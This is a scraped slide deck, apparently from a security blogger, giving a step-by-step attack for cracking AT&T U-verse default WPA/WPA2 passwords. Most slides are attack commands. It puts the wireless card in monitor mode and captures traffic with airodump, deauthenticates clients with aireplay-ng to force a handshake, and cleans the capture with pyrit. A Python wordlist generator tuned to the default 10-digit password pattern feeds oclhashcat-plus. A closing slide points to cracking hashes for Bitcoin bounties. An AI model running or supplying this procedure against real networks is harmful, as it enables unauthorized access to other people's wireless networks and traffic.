Cracking ATT Uverse Default WPA 12 Passwords by
![Cracking AT&T U-verse Default WPA 1/2 Passwords. by Jason Wheeler Awesome blog: http: //blog. Cracking AT&T U-verse Default WPA 1/2 Passwords. by Jason Wheeler Awesome blog: http: //blog.](https://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-1.jpg)
Cracking AT&T U-verse Default WPA 1/2 Passwords. by Jason Wheeler Awesome blog: http: //blog. init 6. me E
![Getting the Handshake Getting the Handshake](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-2.jpg)
Getting the Handshake
![Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R 3 Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R 3](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-3.jpg)
Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R 3 First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode. #airmon-zc start wlan 0 #airodump-ng --encrypt wpa mon 0
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-4.jpg)
![#airmon-zc stop mon 0 Start airmon-zc on the channel of the target. #airmon-zc start #airmon-zc stop mon 0 Start airmon-zc on the channel of the target. #airmon-zc start](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-5.jpg)
#airmon-zc stop mon 0 Start airmon-zc on the channel of the target. #airmon-zc start wlan 0 <Channel Number> Then start airodump on the same channel along with some other options. #airodump-ng mon 0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>
![Deauthenticate a client #aireplay-ng -0 5 -a 00: 14: 6 C: 7 E: 40: Deauthenticate a client #aireplay-ng -0 5 -a 00: 14: 6 C: 7 E: 40:](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-6.jpg)
Deauthenticate a client #aireplay-ng -0 5 -a 00: 14: 6 C: 7 E: 40: 80 -c 00: 0 F: B 5: FD: FB: C 2 mon 0 Where: -0 means deauthentication 5 is the number of deauths to send -a 00: 14: 6 C: 7 E: 40: 80 is the MAC address of the access point -c 00: 0 F: B 5: FD: FB: C 2 is the MAC address of the client you are deauthing mon 0 is the interface name • • •
![WPA Handshake WPA Handshake](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-7.jpg)
WPA Handshake
![Verify 4 -way Handshake Verify 4 -way Handshake](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-8.jpg)
Verify 4 -way Handshake
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-9.jpg)
![PMK = PBKDF 2(passphrase, ssid. Length, 4096, 256) The PTK is a keyed-HMAC function PMK = PBKDF 2(passphrase, ssid. Length, 4096, 256) The PTK is a keyed-HMAC function](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-10.jpg)
PMK = PBKDF 2(passphrase, ssid. Length, 4096, 256) The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4 -Way Handshake.
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-11.jpg)
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-12.jpg)
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-13.jpg)
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-14.jpg)
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-15.jpg)
![Verify 4 -way Handshake The easy way. . . #pyrit -r <FILENAME>. pcap analyze Verify 4 -way Handshake The easy way. . . #pyrit -r <FILENAME>. pcap analyze](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-16.jpg)
Verify 4 -way Handshake The easy way. . . #pyrit -r <FILENAME>. pcap analyze
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-17.jpg)
![](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-18.jpg)
![Strip out the junk. #pyrit -r <FILENAME>. pcap -o OUTPUT. pcap strip Strip out the junk. #pyrit -r <FILENAME>. pcap -o OUTPUT. pcap strip](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-19.jpg)
Strip out the junk. #pyrit -r <FILENAME>. pcap -o OUTPUT. pcap strip
![CAP-2 -HCCAP To turn your pcap file into a hashcat-plus friendly file you can CAP-2 -HCCAP To turn your pcap file into a hashcat-plus friendly file you can](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-20.jpg)
CAP-2 -HCCAP To turn your pcap file into a hashcat-plus friendly file you can upload it to https: //hashcat. net/cap 2 hccap/
![CRACK!! CRACK!!](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-21.jpg)
CRACK!!
![Python Script import sys MAX_INT = 99999 BAD_PATTERNS = {x * 3 for x Python Script import sys MAX_INT = 99999 BAD_PATTERNS = {x * 3 for x](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-22.jpg)
Python Script import sys MAX_INT = 99999 BAD_PATTERNS = {x * 3 for x in '0123456789'} for number in xrange(MAX_INT): int_string = str(number). rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )
![Hashcat-plus $python 2 wire. py |. /oclhashcat-plus 64. bin -m 2500 -a 0 <filename>. Hashcat-plus $python 2 wire. py |. /oclhashcat-plus 64. bin -m 2500 -a 0 <filename>.](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-23.jpg)
Hashcat-plus $python 2 wire. py |. /oclhashcat-plus 64. bin -m 2500 -a 0 <filename>. hccap --gpu-accel=160 --gpu-loops=1024 88, 770 c/s real or $. /oclhashcat-plus 64. bin -m 2500 -a 3 <filename>. hccap --gpuaccel=160 --gpu-loops=1024 -1? d ? 1? 1? 1 114 K c/s real
![Crack for Bitcoin. http: //www. hashbounty. net/bounties Crack for Bitcoin. http: //www. hashbounty. net/bounties](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-24.jpg)
Crack for Bitcoin. http: //www. hashbounty. net/bounties
![sources http: //etutorials. org/Networking/802. 11+security. +wi-fi+protected+access+and+802. 11 i/Part+II+The+Design+of+Wi. Fi+Security/Chapter+10. +WPA+and+RSN+Key+Hierarchy/ sources http: //etutorials. org/Networking/802. 11+security. +wi-fi+protected+access+and+802. 11 i/Part+II+The+Design+of+Wi. Fi+Security/Chapter+10. +WPA+and+RSN+Key+Hierarchy/](http://slidetodoc.com/presentation_image/54cf32a9c7c41dbe9aaab879c71ded6b/image-25.jpg)
sources http: //etutorials. org/Networking/802. 11+security. +wi-fi+protected+access+and+802. 11 i/Part+II+The+Design+of+Wi. Fi+Security/Chapter+10. +WPA+and+RSN+Key+Hierarchy/
- Slides: 25